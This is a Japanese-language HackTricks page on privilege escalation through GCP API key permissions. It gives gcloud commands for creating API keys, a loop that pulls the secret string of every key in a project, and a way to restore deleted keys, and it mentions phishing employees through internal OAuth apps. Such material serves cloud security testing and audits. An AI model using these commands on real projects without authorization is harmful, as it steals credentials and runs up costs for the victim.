GCP - Apikeys Privesc

ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法:

Apikeys

次の権限はAPIキーを作成し盗むのに役立ちます。ドキュメントからの引用: APIキーは、主体なしでアプリケーションを識別する単純な暗号化された文字列です。公開データに匿名でアクセスするために役立ち、クォータと請求のためにAPIリクエストをプロジェクトに関連付けるために使用されます。

したがって、APIキーを使用すると、その企業にAPIの使用料を支払わせることができますが、特権を昇格させることはできません。

APIキーに関する詳細情報は次を参照してください:

pageGCP - API Keys Enum

他のAPIキーの作成方法については次を参照してください:

pageGCP - Serviceusage Privesc

Brute Force API Key access

プロジェクトで有効になっているAPIや見つけたAPIキーに適用される制限がわからない場合は、ツールhttps://github.com/ozguralp/gmapsapiscannerを実行し、APIキーでアクセスできるものを確認してください。

apikeys.keys.create

この権限はAPIキーを作成することを許可します。

gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}

以下は、脆弱性環境の作成、悪用、およびクリーニングを自動化するスクリプトを見つけることができます。

デフォルトでは、ユーザーは新しいプロジェクトを作成する権限を持ち、新しいプロジェクトに対して所有者ロールが付与されます。したがって、ユーザーはプロジェクトを作成し、このプロジェクト内にAPIキーを作成することができます。

apikeys.keys.getKeyStringapikeys.keys.list

これらの権限により、すべてのAPIキーをリストおよび取得し、キーを取得できます。

for  key  in  $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done

以下は、脆弱性環境の作成、悪用、およびクリーニングを自動化するスクリプトを見つけることができます。

apikeys.keys.undeleteapikeys.keys.list

これらの権限により、削除されたAPIキーをリスト化および再生成することができます。undeleteが完了すると、APIキーが出力されます

gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>

内部OAuthアプリケーションを作成して他の従業員をフィッシングする

これを行う方法については、次のページを確認してください。ただし、このアクションはサービス**clientauthconfig**に属していますドキュメントによると:

pageGWS - Google Platforms Phishing
ゼロからヒーローまでのAWSハッキングを学ぶ htARTE (HackTricks AWS Red Team Expert)!

HackTricksをサポートする他の方法:

最終更新